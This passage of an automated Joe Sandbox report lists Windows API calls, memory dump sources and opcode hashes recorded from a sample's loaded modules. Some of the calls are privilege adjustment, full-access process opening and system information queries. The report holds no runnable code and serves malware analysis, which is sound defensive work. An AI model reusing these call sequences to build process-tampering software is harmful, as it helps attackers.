  • Part of subcall function 0BEB8500: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0BEB712F,00000000,0BEB71BB), ref: 0BEB8599
  • Part of subcall function 0BEB8500: ReleaseDC.USER32(00000000,00000000), ref: 0BEB85A4
• CreateCompatibleDC.GDI32(00000000), ref: 0BEB7131
• SelectObject.GDI32(00000000,?), ref: 0BEB714A
• SelectPalette.GDI32(00000000,?,000000FF), ref: 0BEB7173
• RealizePalette.GDI32(00000000), ref: 0BEB717F
Memory Dump Source
• Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
Similarity
• API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
• String ID:
• API String ID: 979337279-0
• Opcode ID: c979cf055c5d8e633e0d12ce1959210ced0ef591ae4170a44c1ce81bc9b8a533
• Instruction ID: dcbd63a4b2040aefa745ca3ada98607f7f44feadbce07b3defe4e3f5aef93531
• Opcode Fuzzy Hash: c979cf055c5d8e633e0d12ce1959210ced0ef591ae4170a44c1ce81bc9b8a533
• Instruction Fuzzy Hash: 57313D34A10618EFC704EF69D981D9EB7F5FF49710B6251A0E808AB721D730EE44DB60
APIs
• _memset.LIBCMT ref: 6A6D79EE
  • Part of subcall function 6A6DB0A0: _memset.LIBCMT ref: 6A6DB0C8
• _memset.LIBCMT ref: 6A6D7A26
• _memset.LIBCMT ref: 6A6D7A43
• _memset.LIBCMT ref: 6A6D7A60
  • Part of subcall function 6A6D5160: LoadLibraryA.KERNEL32(version.dll,?,?,00000000), ref: 6A6D519C
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: _memset$LibraryLoad
• String ID:
• API String ID: 1275148839-0
• Opcode ID: df7fe4c483e12def53df5b104270421f8fec4def07a5e82bf947986d86f07042
• Instruction ID: 412aed6eae7bd646819d47859247c3e916ba6d4160fc25c61f5a29557a8aed8c
• Opcode Fuzzy Hash: df7fe4c483e12def53df5b104270421f8fec4def07a5e82bf947986d86f07042
• Instruction Fuzzy Hash: FA21F4B1508384AAD220D764DD89FDB77EC9F84348F48492DE59886152FA70970CC7E3
APIs
• _memset.LIBCMT ref: 6A6DB0C8
  • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
  • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
  • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
  • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
  • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
  • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
  • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
  • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
• GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104,?,?,?,00000000,00000000), ref: 6A6DB10C
• _strncpy.LIBCMT ref: 6A6DB131
• CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104,?,?,?,00000000,00000000), ref: 6A6DB13A
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryVirtual$AllocateInformationOpenProcessQuerySystem$AdjustCloseFileFreeHandleModuleNamePrivilege_memset_strncpy
                                                                                  • String ID:
                                                                                  • API String ID: 2990829516-0
                                                                                  APIs
                                                                                  • GetClassInfoA.USER32(0BE90000,0BEB1BBC,?), ref: 0BEB1BED
                                                                                  • UnregisterClassA.USER32(0BEB1BBC,0BE90000), ref: 0BEB1C16
                                                                                  • RegisterClassA.USER32(0BEF8BCC), ref: 0BEB1C20
                                                                                  • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0BEB1C6B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                  • String ID:
                                                                                  • API String ID: 4025006896-0
                                                                                  APIs
                                                                                  • __EH_prolog3.LIBCMT ref: 6A6F1622
                                                                                    • Part of subcall function 6A6EE09C: _malloc.LIBCMT ref: 6A6EE0BA
                                                                                  • __CxxThrowException@8.LIBCMT ref: 6A6F1658
                                                                                  • FormatMessageA.KERNEL32(00001100,00000000,?,00000800,6A725A50,00000000,00000000,?,6A71B745,6A71B74D,6A725A50,00000004,6A6DEA16,?,6A6DE6B8,80070057), ref: 6A6F1683
                                                                                    • Part of subcall function 6A6EE27D: __cftof.LIBCMT ref: 6A6EE28E
                                                                                  • LocalFree.KERNEL32(?), ref: 6A6F16AC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow__cftof_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 1808948168-0
                                                                                  APIs
                                                                                  • __EH_prolog3.LIBCMT ref: 6A6EF875
                                                                                    • Part of subcall function 6A6F0620: __EH_prolog3.LIBCMT ref: 6A6F0627
                                                                                  • __strdup.LIBCMT ref: 6A6EF897
                                                                                  • GetCurrentThread.KERNEL32 ref: 6A6EF8C4
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6A6EF8CD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentH_prolog3Thread$__strdup
                                                                                  • String ID:
                                                                                  • API String ID: 4206445780-0
                                                                                  APIs
                                                                                  • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 6A6F9A44
                                                                                  • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 6A6F9A6F
                                                                                  • GetCapture.USER32 ref: 6A6F9A81
                                                                                  • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 6A6F9A90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Capture
                                                                                  • String ID:
                                                                                  • API String ID: 1665607226-0
                                                                                  APIs
                                                                                  • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 6A6F4F7B
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 6A6F4F84
                                                                                  • swprintf.LIBCMT ref: 6A6F4FA1
                                                                                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 6A6F4FB2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClosePrivateProfileStringValueWriteswprintf
                                                                                  • String ID:
                                                                                  • API String ID: 22681860-0
                                                                                  APIs
                                                                                    • Part of subcall function 6A6EE09C: _malloc.LIBCMT ref: 6A6EE0BA
                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 6A6FB07A
                                                                                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 6A6FB080
                                                                                  • DuplicateHandle.KERNEL32(00000000), ref: 6A6FB083
                                                                                  • GetLastError.KERNEL32(?), ref: 6A6FB09E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 3704204646-0
                                                                                  • Opcode ID: a5019984da37569fdb3d8c1abcdca9222c857c7390bc372935d947b6c2468e16
                                                                                  • Instruction ID: c14f2778d071ad59add8ed423930bd531a2ff5509d196e16fe0a77111a25a86f
                                                                                  • Opcode Fuzzy Hash: a5019984da37569fdb3d8c1abcdca9222c857c7390bc372935d947b6c2468e16
                                                                                  • Instruction Fuzzy Hash: AD017131700204BFDB109BA6CC49F5A7BEAEB85764F158825F924CB282DF71DC02CB60
                                                                                  APIs
                                                                                  • FindResourceA.KERNEL32(?,?,?), ref: 0BEAD68F
                                                                                  • LoadResource.KERNEL32(?,0BEAD71C,?,?,?,0BEA954C,?,00000001,00000000,?,0BEAD5E8,?), ref: 0BEAD6A9
                                                                                  • SizeofResource.KERNEL32(?,0BEAD71C,?,0BEAD71C,?,?,?,0BEA954C,?,00000001,00000000,?,0BEAD5E8,?), ref: 0BEAD6C3
                                                                                  • LockResource.KERNEL32(0BEAD3E0,00000000,?,0BEAD71C,?,0BEAD71C,?,?,?,0BEA954C,?,00000001,00000000,?,0BEAD5E8,?), ref: 0BEAD6CD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                  • String ID:
                                                                                  • API String ID: 3473537107-0
                                                                                  • Opcode ID: dd71b1d8c3ee8c18feb184a30f6369b2d0be762160bd6430f49bd1789277e1bd
                                                                                  • Instruction ID: 0c5a26b1a18edefb709f978b1500c7846eef144dfa65ef04ddc84f31e7ed5d50
                                                                                  • Opcode Fuzzy Hash: dd71b1d8c3ee8c18feb184a30f6369b2d0be762160bd6430f49bd1789277e1bd
                                                                                  • Instruction Fuzzy Hash: 78F0A4B36052087F4B04FE5CAC81DAB77ECDE891603505069FD0CCB205DA30ED154379
                                                                                  APIs
                                                                                  • GetTopWindow.USER32(?), ref: 6A6F8773
                                                                                  • GetTopWindow.USER32(00000000), ref: 6A6F87B2
                                                                                  • GetWindow.USER32(00000000,00000002), ref: 6A6F87D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window
                                                                                  • String ID:
                                                                                  • API String ID: 2353593579-0
                                                                                  • Opcode ID: 1a99f7ebcb7ff8016dfc7be1f5621bb52340028688bdf776efd9e223c34a4470
                                                                                  • Instruction ID: 18b6413333ace153c1d073bdac508e2f087d89ff1aa09f3fa02ee0624ec9ca20
                                                                                  • Opcode Fuzzy Hash: 1a99f7ebcb7ff8016dfc7be1f5621bb52340028688bdf776efd9e223c34a4470
                                                                                  • Instruction Fuzzy Hash: D201D33210121ABBDF135E96DC45E9F3E6BAF4A360F054860FA2461071CB36C962EBA5
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,?), ref: 6A6F812C
                                                                                  • GetTopWindow.USER32(00000000), ref: 6A6F813F
                                                                                    • Part of subcall function 6A6F811F: GetWindow.USER32(00000000,00000002), ref: 6A6F8186
                                                                                  • GetTopWindow.USER32(?), ref: 6A6F816F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Item
                                                                                  • String ID:
                                                                                  • API String ID: 369458955-0
                                                                                  • Opcode ID: 990f5dde1885c8ed9070c860c6a815682f599c59ef309e791ee7cafd417dfeb2
                                                                                  • Instruction ID: 3979cdb96f13ce09f7ec60a5d44aea8c100ffcdd3617e59df5d5e172f3c50c88
                                                                                  • Opcode Fuzzy Hash: 990f5dde1885c8ed9070c860c6a815682f599c59ef309e791ee7cafd417dfeb2
                                                                                  • Instruction Fuzzy Hash: 45018436145617B7DF229EA78C05E8F3A6FAF42364B058A60FE1495120DF31C9138AE4
                                                                                  APIs
                                                                                  • GetFileSize.KERNEL32(?,?,?,?,?,?,6A6D184E,?), ref: 6A6E0CDA
                                                                                  • SetFilePointer.KERNEL32(00000000,-000000FC,00000000,00000001,?,?,?,?,?,?,6A6D184E,?), ref: 6A6E0CE9
                                                                                  • __aullrem.LIBCMT ref: 6A6E0CFC
                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000,?,000000FF,00000000,?,?,?,?,?,?,6A6D184E), ref: 6A6E0D1A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$PointerSizeWrite__aullrem
                                                                                  • String ID:
                                                                                  • API String ID: 2200587376-0
                                                                                  • Opcode ID: f2d9de0929714e6fc8513a1a70e298ab23dbbb3592f2966262c1dfd4dd12f787
                                                                                  • Instruction ID: 7d3592795ff1cf28b185dbe4d366109d90df7b9221ebffa7ebf9a39b054605f0
                                                                                  • Opcode Fuzzy Hash: f2d9de0929714e6fc8513a1a70e298ab23dbbb3592f2966262c1dfd4dd12f787
                                                                                  • Instruction Fuzzy Hash: 16F081710483516EE700DB64DC49BBBBBE8AF95B04F08892CF594D6181DBB8890987A3
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DeleteObject$Release
                                                                                  • String ID:
                                                                                  • API String ID: 2600533906-0
                                                                                  • Opcode ID: 4773f35ff4d44fa0fb45e9d4a0444aafed2083f8118080a5cb3bc32108dcd712
                                                                                  • Instruction ID: 6638943072cd24d916dd9c3b122d9df0fb6f138824b3353075a3d13c42c1d5e0
                                                                                  • Opcode Fuzzy Hash: 4773f35ff4d44fa0fb45e9d4a0444aafed2083f8118080a5cb3bc32108dcd712
                                                                                  • Instruction Fuzzy Hash: 43E06D71A54205AEEF50EBE8A843EBF73B8FB44300F405410F62086180C774AC0CC720
                                                                                  APIs
                                                                                  • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0BEF4D84
                                                                                  • PostQuitMessage.USER32(?), ref: 0BEF4D99
                                                                                  • TranslateMessage.USER32 ref: 0BEF4DA1
                                                                                  • DispatchMessageA.USER32 ref: 0BEF4DA7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$DispatchPeekPostQuitTranslate
                                                                                  • String ID:
                                                                                  • API String ID: 1277387291-0
                                                                                  • Opcode ID: 60412853910e960549ee3fb45b6a9daf6bfc4968fc1a9752075e530c640a76ca
                                                                                  • Instruction ID: a6c47eaf1b47f06756c6a94951d6577d148a7a74466eb4f676c16e520d23253d
                                                                                  • Opcode Fuzzy Hash: 60412853910e960549ee3fb45b6a9daf6bfc4968fc1a9752075e530c640a76ca
                                                                                  • Instruction Fuzzy Hash: C3E0C230924302BEED60BA609C03F9B31A81B40A20F8025097A04961C2EBA6D54C82A7
                                                                                  APIs
                                                                                  • GlobalHandle.KERNEL32 ref: 0BE97BE3
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0BE97BEA
                                                                                  • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0BE97BEF
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0BE97BF5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$AllocHandleLockUnlock
                                                                                  • String ID:
                                                                                  • API String ID: 2167344118-0
                                                                                  • Opcode ID: 12c31064beb9c0d1e1d5bb3fc420e02b111f226ff6da3f7fc0f00632f81f9461
                                                                                  • Instruction ID: c7f50a2d013b2b752f583cb66f5008007b900354ab229cec363eeb8a854906da
                                                                                  • Opcode Fuzzy Hash: 12c31064beb9c0d1e1d5bb3fc420e02b111f226ff6da3f7fc0f00632f81f9461
                                                                                  • Instruction Fuzzy Hash: 07B009D49756003CAE0A73F06E0BD7B281CA8A054A395AE687820A20229A68AC4E403A
                                                                                  Strings
                                                                                  • GetXzsDlqTypeByOurType unknow type..., xrefs: 6A6D33BE
                                                                                  • C:\pl.txt, xrefs: 6A6D33A4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: C:\pl.txt$GetXzsDlqTypeByOurType unknow type...
                                                                                  • API String ID: 0-1978444376
                                                                                  • Opcode ID: e3078f2f230c083c6c644deb5ae9034c8c1d820d19df745bb47d02daf4b59a1b
                                                                                  • Instruction ID: 36eb803098ef30027ef175d3fd25feee4a728fb7260c0a7521225e266dd5353d
                                                                                  • Opcode Fuzzy Hash: e3078f2f230c083c6c644deb5ae9034c8c1d820d19df745bb47d02daf4b59a1b
                                                                                  • Instruction Fuzzy Hash: 6D517993F0907066EA5420CCB990688D311838ABF3F761CBBE65ADB6A1EF45CC9553C1
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 6A6EDC98
                                                                                    • Part of subcall function 6A6FDB7C: __FF_MSGBANNER.LIBCMT ref: 6A6FDB9F
                                                                                    • Part of subcall function 6A6FDB7C: __NMSG_WRITE.LIBCMT ref: 6A6FDBA6
                                                                                    • Part of subcall function 6A6FDB7C: HeapAlloc.KERNEL32(00000000,?,00000001,00000000,00000000,?,6A706F8E,?,00000001,?,?,6A705E77,00000018,6A726C18,0000000C,6A705F08), ref: 6A6FDBF3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocHeap_malloc
                                                                                  • String ID: %1s
                                                                                  • API String ID: 3293231637-3465968173
                                                                                  • Opcode ID: 23a560e7da4a6c7b76c7fad7ccc91b2c2e4ba5261362cb5a41557ae83a64ddfc
                                                                                  • Instruction ID: 1b57ccba48a9db6b390da0785425beb65d59beed7dd85faaeb10b9688dfafafa
                                                                                  • Opcode Fuzzy Hash: 23a560e7da4a6c7b76c7fad7ccc91b2c2e4ba5261362cb5a41557ae83a64ddfc
                                                                                  • Instruction Fuzzy Hash: 7771E2B150D341DBD710CF64C884AABB7F6BBCA314F06492DE8988B341EF31E9068796
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (qj
                                                                                  • API String ID: 0-3815605640
                                                                                  • Opcode ID: 4eee9d878fd311126784a62218db2e381659fa71c1221016ecfa2bade86d2b2b
                                                                                  • Instruction ID: 2e21cb4261d91de94344de381fd0d3a15ada0cfb607980f49cddcea7c9f31b25
                                                                                  • Opcode Fuzzy Hash: 4eee9d878fd311126784a62218db2e381659fa71c1221016ecfa2bade86d2b2b
                                                                                  • Instruction Fuzzy Hash: 24519CB5A08705DFC704CF29D480A6AFBE1BF88304F81856EE8598B756DB31F855CB86
                                                                                  APIs
                                                                                    • Part of subcall function 0BEB3A34: RtlEnterCriticalSection.NTDLL(0C4E1C00), ref: 0BEB3A38
                                                                                  • CreateFontIndirectA.GDI32(?), ref: 0BEB4852
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
